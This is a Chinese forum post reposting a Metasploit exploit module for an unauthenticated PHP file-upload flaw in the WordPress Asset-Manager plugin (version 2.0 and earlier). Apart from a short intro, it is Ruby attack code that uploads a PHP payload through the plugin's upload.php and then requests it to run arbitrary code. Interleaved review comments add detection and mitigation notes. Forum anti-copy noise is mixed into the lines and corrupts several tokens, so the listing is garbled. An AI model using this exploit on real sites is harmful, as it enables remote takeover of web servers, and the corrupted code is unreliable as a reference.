
WordPress Asset-Manager PHP文件上传漏洞

发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用的是 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许未经身份验证的用户向一个临时目录上传 PHP 文件,从而导致任意代码执行。
2 {* Y" N- ~5 w* y- e0 E# y/ w/ x. ?& F
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

1 w2 T1 e$ {, d( H) h$ h7 |* E6 Arequire 'msf/core'
( Z+ A5 ~$ L! t& Orequire 'msf/core/exploit/php_exe'
" U$ j( Z" s8 g/ z" S5 G- T  `" V
# Metasploit exploit module for the WordPress Asset-Manager plugin (<= 2.0, per the
# 'Description' below): an unauthenticated multipart POST to the plugin's upload.php
# stores a PHP file under wp-content/uploads/assets/temp/, which is then requested
# directly so the web server executes it.
#
# NOTE(review): this listing is corrupted by interleaved forum anti-copy noise (for
# example the include line ending in "Exploit:hpEXE" and the "end" fused with noise
# inside #exploit), so it does not load as-is; treat it as a reference copy only.
#
# Defender notes (every path below is taken from the request code in #exploit):
#  - detection: a POST to <TARGETURI>/wp-content/plugins/asset-manager/upload.php
#    carrying a multipart part named "Filedata" with a .php filename, followed by a
#    GET of <TARGETURI>/wp-content/uploads/assets/temp/<five random letters>.php;
#  - mitigation: update the plugin beyond 2.0 if a fixed release is available (or
#    remove it), and deny PHP execution under wp-content/uploads/ so that an
#    uploaded script cannot be run even if the upload succeeds.
2 b; C: G6 K8 m: c, }" Y( `7 zclass Metasploit3 < Msf::Exploit::Remote
  M, Z+ Z2 j5 J) m  Rank = ExcellentRanking, K1 u2 }8 W! Y3 Y0 z, B& D

) w, e6 ?2 p" a, Y% f, g" {  include Msf::Exploit::Remote::HttpClient
; z9 r/ B6 v0 a' F4 _. G* o  include Msf::Exploit:hpEXE
4 l- L  [( {" \# b8 w: b+ x $ L& _' E6 x' G- t
  # Module metadata only (name, description, authors, references, payload
  # constraints, targets) plus the single TARGETURI option; nothing here touches
  # the network.
  def initialize(info = {})/ [5 Q9 }" C0 c7 p6 k( i$ T6 Y
    super(update_info(info,
( h3 f$ D7 A- X, ]      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',2 x$ X# m& q# O  T( p
      'Description'    => %q{  G0 K7 R% Y3 j5 u: D0 U
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress( _: u! [5 b/ c: A! M: E6 O
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
% `2 _9 H' W9 u( G! I* v7 n        temp directory without authentication, which results in arbitrary code execution.
: n8 ~! v, U) h& Y1 |4 V$ q. f      },  u9 `; u8 x  S$ X
      'Author'         =>( ]/ T/ E4 Z- Y' j. W5 U
        [4 z" v4 D" N$ p
          'Sammy FORGIT', # initial discovery* L, w' d$ {: ]/ C3 ?) R
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module( R6 u$ z7 S; D0 u) a0 z% t7 m0 @
        ],
, A, Z! i3 w( C% A! \. \" k      'License'        => MSF_LICENSE,
% M, }! @1 t9 a; \      'References'     =>
5 a  T4 M0 t' v1 H2 D! I        [- Y/ U: S" N3 o) h
          [ 'OSVDB', '82653' ],* A7 N7 v( b( u  [0 ]
          [ 'BID', '53809' ],% I! ^6 w9 V1 [- a& s* h
          [ 'EDB', '18993' ],1 ~1 ]' K$ H( m# D2 \8 z# d1 M# `
          [ 'URL', 'http:// www.myhack58.com /' ]
# O6 L4 v* q) x1 U" ?        ],* |) u& C% k: l9 u
      'Payload'       =>
% F) _: i" t0 g, Z        {
3 O# Y: `9 q* [9 |, K          'BadChars' => "\x00",8 _6 H1 U5 [' F' P
        },
, m: A7 k0 Q) Z0 p$ l      'Platform'       => 'php',6 u6 M9 O- ]! ^, Z
      'Arch'           => ARCH_PHP,
6 r$ H! I% Y5 k1 ?' `% I( {( o3 n      'Targets'        =>
# B, d6 I4 [- ]# O+ H        [
4 \3 a! ]  ]* i5 y          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
8 V0 I: X. U# K4 ?          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
( J9 X5 z9 o* d        ],$ k/ B+ ?0 a; w, V9 d
      'DefaultTarget' => 0,9 X4 Q( u7 C) I' n- D  B: F
      'DisclosureDate' => 'May 26 2012'))
$ m# `6 m% k+ e$ A ; S: ^/ E: h2 l+ A
    # TARGETURI is the WordPress base path (default '/wordpress'); #exploit appends
    # a trailing slash when it is missing before building the request URIs.
    register_options(+ t+ {5 M: w" w
      [
3 ?. l0 w0 q; ?- x7 z/ g        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 m$ A1 ]7 \. ~: ~: g$ p1 x
      ], self.class). k8 R4 n# ~3 {: n
  end
1 S1 H6 M" \( ^, D0 } 3 X2 Y5 z8 J2 R) J  ~- K, D
  # Two-step sequence: upload a PHP payload through the plugin's upload.php, then
  # request the stored file so the web server executes it. Calls fail_with on an
  # unexpected upload reply; a nil reply to the second request is NOT treated as a
  # failure (see the check at the end of the method).
  def exploit8 L) I8 B* J) _7 U
    uri =  target_uri.path
    # Normalise the base path to end in '/' (reviewer: `uri.end_with?('/')` reads
    # better than the `[-1,1]` slice).
1 d) i, K1 P3 A" X% X% U    uri << '/' if uri[-1,1] != '/'
( g% r  @1 i) Y9 ~) {    peer = "#{rhost}:#{rport}"
    # Random five-letter .php name, so the stored file path differs on every run.
# O( D$ {8 I: m+ ?0 [    payload_name = "#{rand_text_alpha(5)}.php"! J4 t5 L# W" P; x; D6 }
    # :unlink_self presumably makes the PHP stub delete itself after running —
    # confirm against the PhpEXE mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)
- R4 g# n/ B; _9 Z. m
    # Multipart body with a single part: the PHP file in the form field "Filedata".
( @5 x7 Y3 g  m    data = Rex::MIME::Message.new3 U+ {  r6 Z, s- R: V' z5 o
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")) P8 X( R% r8 u, D+ a2 F
    # Strip the CRLF that precedes the first "--_Part_" boundary so the body starts
    # directly at the boundary line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 }0 i' ~+ B; t; P7 h, V- Y6 g- O
6 l( t  K7 s7 J0 R8 u5 S2 H) o    print_status("#{peer} - Uploading payload #{payload_name}"): D, B/ _$ U4 B! A) L! }  \& ?) S8 ?
    # Step 1: POST the file to the plugin's upload handler (no authentication).
    res = send_request_cgi({
: t1 o0 J. v+ I2 F* u3 Y      'method'  => 'POST',6 p+ A& M& P' x
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ r( {" A6 C( F3 V+ p      'ctype'   => "multipart/form-data; boundary=#{data.bound}",6 K# _2 {5 |; d6 v
      'data'    => post_data) ?0 K( }$ C5 }& d$ C- \3 v
    })$ P/ G. E# z3 n! E9 a! X

    # The upload counts as successful only when the reply is HTTP 200 and its body
    # echoes the uploaded filename. NOTE(review): `not`/`or` work here because
    # `not` binds tighter than `or`, but `!res || ...` is the idiomatic form.
: R* T1 y* X8 {; h/ M( j& d    if not res or res.code != 200 or res.body !~ /#{payload_name}/
) k9 S0 N8 x- O2 O+ b/ I7 r; D" R      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; S9 ^7 a7 V( j5 qend
  s1 A+ ]5 v+ P+ L- p1 e( ~% g: K 9 ~' F9 q# p' X5 H( v
    print_status("#{peer} - Executing payload #{payload_name}")5 ?, p% G8 c) {6 G; Z8 ]
    # Step 2: GET the stored file from the plugin's temp upload directory.
    res = send_request_raw({2 x3 B/ v3 ~2 A3 |5 h% [0 b+ Y
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
: ~8 w$ c" I! P/ @. E/ s  ?      'method'  => 'GET'- @! p$ q$ {" j! Y3 o
    })" T' a/ c, ~/ t, {5 b& s3 r
6 M- Y) I# y; _- e
    # NOTE(review): only a non-nil reply with a non-200 status is reported as a
    # failure; a nil reply passes silently. That may be deliberate for a payload
    # that never returns a response — confirm rather than "fix".
    if res and res.code != 200
% L' D3 U- Z/ Q) ]- i) W      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")+ `! l. d6 L& C; L! K: Z8 u7 e. i
    end
- [3 K, \! J1 c9 ]; p! `2 z& d  end7 `/ {4 v: P8 F  c; r0 {; K
end
) D- Q9 s% p' r' k, N" C" S